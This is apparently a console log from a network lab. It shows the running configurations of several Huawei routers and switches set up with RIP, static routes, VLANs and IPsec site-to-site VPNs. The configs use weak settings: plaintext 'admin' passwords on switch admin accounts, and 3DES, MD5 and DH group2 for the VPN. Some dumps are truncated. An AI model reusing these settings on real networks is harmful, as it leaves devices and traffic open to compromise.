ip address 10.30.30.1 255.255.255.0
#
interface GigabitEthernet0/0/1
ip address 10.1.1.1 255.255.255.0
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
rip 1
version 2
network 10.0.0.0
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
[Huawei]
[Huawei]
AR2
[Huawei]dis current-configuration
[V200R003C00]
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ip address 10.1.1.2 255.255.255.0
#
interface GigabitEthernet0/0/1
ip address 10.2.2.2 255.255.255.0
#
interface GigabitEthernet0/0/2
ip address 10.20.20.1 255.255.255.0
#
interface NULL0
#
rip 1
version 2
network 10.0.0.0
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
[Huawei]
AR3
[Huawei]dis current-configuration
[V200R003C00]
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ip address 10.2.2.3 255.255.255.0
#
interface GigabitEthernet0/0/1
ip address 10.10.10.1 255.255.255.0
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
rip 1
version 2
network 10.0.0.0
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
[Huawei]
ARJ
<arj>dis current-configuration
[V200R003C00]
#
sysname arj
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
acl number 3000
rule 5 permit ip source 172.16.0.0 0.15.255.255 destination 172.16.0.0 0.15.255
.255
rule 100 deny ip
#
ipsec proposal test
esp authentication-algorithm sha1
esp encryption-algorithm 3des
#
ike proposal 1
dh group2
authentication-algorithm md5
#
ike peer test v2
pre-shared-key cipher %$%$u#%,6(dQAZ/e99XOocC@,.2n%$%$
remote-address 10.10.10.2
#
ipsec policy RJ-RQ-IPSecVPN 1 isakmp
security acl 3000
ike-peer test
proposal test
ipsec policy RT-RQ-IPSecVPN 1 isakmp
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ip address 10.50.50.1 255.255.255.0
#
interface GigabitEthernet0/0/1
ip address 10.30.30.2 255.255.255.0
ipsec policy RJ-RQ-IPSecVPN
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
ip route-static 0.0.0.0 0.0.0.0 10.30.30.1
ip route-static 172.21.0.0 255.255.0.0 10.50.50.2
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
<arj>
ART
<art>save
The current configuration will be written to the device.
Are you sure to continue? (y/n)[n]:y
It will take several minutes to save configuration file, please wait........
Configuration file had been saved successfully
Note: The configuration file will take effect after being activated
<art>
<art>
Please check whether system data has been changed, and save data in time
Configuration console time out, please press any key to log on
<art>dis cu
<art>dis current-configuration
[V200R003C00]
#
sysname art
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
acl number 3000
rule 5 permit ip source 172.16.0.0 0.15.255.255 destination 172.16.0.0 0.15.255
.255
rule 100 deny ip
#
ipsec proposal test
esp authentication-algorithm sha1
esp encryption-algorithm 3des
#
ike proposal 1
dh group2
authentication-algorithm md5
#
ike peer test v2
pre-shared-key cipher %$%$u#%,6(dQAZ/e99XOocC@,.2n%$%$
remote-address 10.10.10.2
#
ipsec policy RT-RQ-IPSecVPN 1 isakmp
security acl 3000
ike-peer test
proposal test
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ip address 10.200.200.1 255.255.255.0
#
interface GigabitEthernet0/0/1
ip address 10.20.20.2 255.255.255.0
ipsec policy RT-RQ-IPSecVPN
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
ip route-static 0.0.0.0 0.0.0.0 10.20.20.1
ip route-static 172.30.0.0 255.255.0.0 10.200.200.2
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
<art>
ARQ
<arq>dis current-configuration
[V200R003C00]
#
sysname arq
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
acl number 3000
rule 5 permit ip source 172.16.0.0 0.15.255.255 destination 172.16.0.0 0.15.255
.255
rule 100 deny ip
acl number 3001
rule 5 permit ip source 172.16.0.0 0.15.255.255 destination 172.21.0.0 0.0.255.
255
rule 10 deny ip
#
ipsec proposal test
esp authentication-algorithm sha1
esp encryption-algorithm 3des
ipsec proposal rq-rj
esp authentication-algorithm sha1
esp encryption-algorithm 3des
#
ike proposal 1
dh group2
authentication-algorithm md5
#
ike proposal 2
dh group2
authentication-algorithm md5
#
ike peer rq-rj v2
remote-address 10.30.30.2
ike peer test v2
pre-shared-key cipher %$%$u#%,6(dQAZ/e99XOocC@,.2n%$%$
remote-address 10.20.20.2
#
ipsec policy RQ-RJ-IPsecVPN 1 isakmp
security acl 3001
ike-peer rq-rj
<arq>
<arq>
<arq>dis cu
<arq>dis current-configuration
[V200R003C00]
#
sysname arq
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load flash:/portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
wlan ac-global carrier id other ac id 0
#
set cpu-usage threshold 80 restore 75
#
acl number 3000
rule 5 permit ip source 172.16.0.0 0.15.255.255 destination 172.16.0.0 0.15.255
.255
rule 100 deny ip
acl number 3001
rule 5 permit ip source 172.16.0.0 0.15.255.255 destination 172.21.0.0 0.0.255.
255
rule 10 deny ip
#
ipsec proposal test
esp authentication-algorithm sha1
esp encryption-algorithm 3des
ipsec proposal rq-rj
esp authentication-algorithm sha1
esp encryption-algorithm 3des
#
ike proposal 1
dh group2
authentication-algorithm md5
#
ike proposal 2
dh group2
authentication-algorithm md5
#
ike peer rq-rj v2
remote-address 10.30.30.2
ike peer test v2
pre-shared-key cipher %$%$u#%,6(dQAZ/e99XOocC@,.2n%$%$
remote-address 10.20.20.2
#
ipsec policy RQ-RJ-IPsecVPN 1 isakmp
security acl 3001
ike-peer rq-rj
proposal rq-rj
ipsec policy RT-RQ-IPSecVPN 1 isakmp
security acl 3000
ike-peer test
proposal test
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ip address 10.10.10.2 255.255.255.0
ipsec policy RT-RQ-IPSecVPN
#
interface GigabitEthernet0/0/1
ip address 10.100.100.1 255.255.255.0
ipsec policy RQ-RJ-IPsecVPN
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
ip route-static 0.0.0.0 0.0.0.0 10.10.10.1
ip route-static 172.16.0.0 255.255.0.0 10.100.100.2
ip route-static 172.17.0.0 255.255.0.0 10.100.100.2
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
<arq>
LSW3
<Huawei>dis current-configuration
#
sysname Huawei
#
undo info-center enable
#
vlan batch 128 130 132 160 300 302 2110 to 2111
#
cluster enable
ntdp enable
ndp enable
#
drop illegal-mac alarm
#
diffserv domain default
#
drop-profile default
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password simple admin
local-user admin service-type http
#
interface Vlanif1
#
interface Vlanif302
ip address 10.50.50.2 255.255.255.0
#
interface Vlanif2110
ip address 172.21.10.1 255.255.255.0
#
interface Vlanif2111
ip address 172.21.11.1 255.255.255.0
#
interface MEth0/0/1
#
interface GigabitEthernet0/0/1
port link-type access
port default vlan 302
#
interface GigabitEthernet0/0/2
port link-type access
port default vlan 2110
#
interface GigabitEthernet0/0/3
port link-type access
port default vlan 2111
#
...
#
interface GigabitEthernet0/0/24
#
interface NULL0
#
ip route-static 0.0.0.0 0.0.0.0 10.50.50.1
#
user-interface con 0
user-interface vty 0 4
#
return
<Huawei>
LSW1
<Huawei>dis current-configuration
#
sysname Huawei
#
undo info-center enable
#
vlan batch 128 130 132 160 300 2110
#
cluster enable
ntdp enable
ndp enable
#
drop illegal-mac alarm
#
diffserv domain default
#
drop-profile default
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password simple admin
local-user admin service-type http
#
interface Vlanif1
#
interface Vlanif128
ip address 172.30.128.1 255.255.255.0
#
interface Vlanif130
ip address 172.30.130.1 255.255.255.0
#
interface Vlanif132
ip address 172.30.132.1 255.255.255.0
#
interface Vlanif300
ip address 10.200.200.2 255.255.255.0
#
interface MEth0/0/1
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk allow-pass vlan 2 to 4094
#
interface GigabitEthernet0/0/2
port link-type access
port default vlan 300
#
interface GigabitEthernet0/0/3
#
interface GigabitEthernet0/0/4
#
interface GigabitEthernet0/0/5
...
#
interface GigabitEthernet0/0/22
#
interface GigabitEthernet0/0/23
#
interface GigabitEthernet0/0/24
#
interface NULL0
#
ip route-static 0.0.0.0 0.0.0.0 10.200.200.1
#
user-interface con 0
user-interface vty 0 4
#
return
<Huawei>
<Huawei>
LSW4
<Huawei>save
The current configuration will be written to the device.
Are you sure to continue?[Y/N]y
Info: Please input the file name ( *.cfg, *.zip ) [vrpcfg.zip]:
Now saving the current configuration to the slot 0.
Save the configuration successfully.
<Huawei>
<Huawei>dis cur
<Huawei>dis current-configuration
#
sysname Huawei
#
undo info-center enable
#
vlan batch 128 130 132 160 300 2110
#
cluster enable
ntdp enable
ndp enable
#
drop illegal-mac alarm
#
diffserv domain default
#
drop-profile default
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password simple admin
local-user admin service-type http
#
interface Vlanif1
#
interface MEth0/0/1
#
interface Ethernet0/0/1
port link-type trunk
port trunk allow-pass vlan 2 to 4094
#
interface Ethernet0/0/2
port link-type trunk
port trunk allow-pass vlan 2 to 4094
#
interface Ethernet0/0/3
port link-type access
port default vlan 132
#
interface Ethernet0/0/4
port link-type access
port default vlan 128
#
interface Ethernet0/0/5
port link-type access
port default vlan 128
#
interface Ethernet0/0/6
#
interface Ethernet0/0/7
#
interface Ethernet0/0/8
#
interface Ethernet0/0/9
#
interface Ethernet0/0/10
...
#
interface Ethernet0/0/21
#
interface Ethernet0/0/22
#
interface GigabitEthernet0/0/1
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
user-interface con 0
user-interface vty 0 4
#
return
<Huawei>
<Huawei>
LSW5
<Huawei> DIS CUR
#
sysname Huawei
#
undo info-center enable
#
vlan batch 128 130 132 160 300 2110
#
cluster enable
ntdp enable
ndp enable
#
drop illegal-mac alarm
#
diffserv domain default
#
drop-profile default
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password simple admin
local-user admin service-type http
#
interface Vlanif1
#
interface MEth0/0/1
#
interface Ethernet0/0/1
port link-type trunk
port trunk allow-pass vlan 2 to 4094
#
interface Ethernet0/0/2
port link-type access
port default vlan 130
#
interface Ethernet0/0/3
#
interface Ethernet0/0/4
#
interface Ethernet0/0/5
#
interface Ethernet0/0/6
#
interface Ethernet0/0/7
#
interface Ethernet0/0/8
#
interface Ethernet0/0/9
#
interface Ethernet0/0/10
#
interface Ethernet0/0/11
#
...
interface Ethernet0/0/22
#
interface GigabitEthernet0/0/1
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
user-interface con 0
user-interface vty 0 4
#
return
<Huawei>
LSW2
<Huawei>dis current-configuration
#
sysname Huawei
#
undo info-center enable
#
vlan batch 128 130 132 160 170 300 to 301 2110 to 2111
#
cluster enable
ntdp enable
ndp enable
#
drop illegal-mac alarm
#
diffserv domain default
#
drop-profile default
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password simple admin
local-user admin service-type http
#
interface Vlanif1
#
interface Vlanif160
ip address 172.16.0.1 255.255.255.0
#
interface Vlanif170
ip address 172.17.0.1 255.255.255.0
#
interface Vlanif301
ip address 10.100.100.2 255.255.255.0
#
interface MEth0/0/1
#
interface GigabitEthernet0/0/1
port link-type access
port default vlan 301
#
interface GigabitEthernet0/0/2
port link-type access
port default vlan 160
#
interface GigabitEthernet0/0/3
port link-type access
port default vlan 170
#
interface GigabitEthernet0/0/4
#
...
interface GigabitEthernet0/0/21
#
interface GigabitEthernet0/0/22
#
interface GigabitEthernet0/0/23
#
interface GigabitEthernet0/0/24
#
interface NULL0
#
ip route-static 0.0.0.0 0.0.0.0 10.100.100.1
#
user-interface con 0
user-interface vty 0 4
#
return
<Huawei>
<Huawei>
0xff: File download
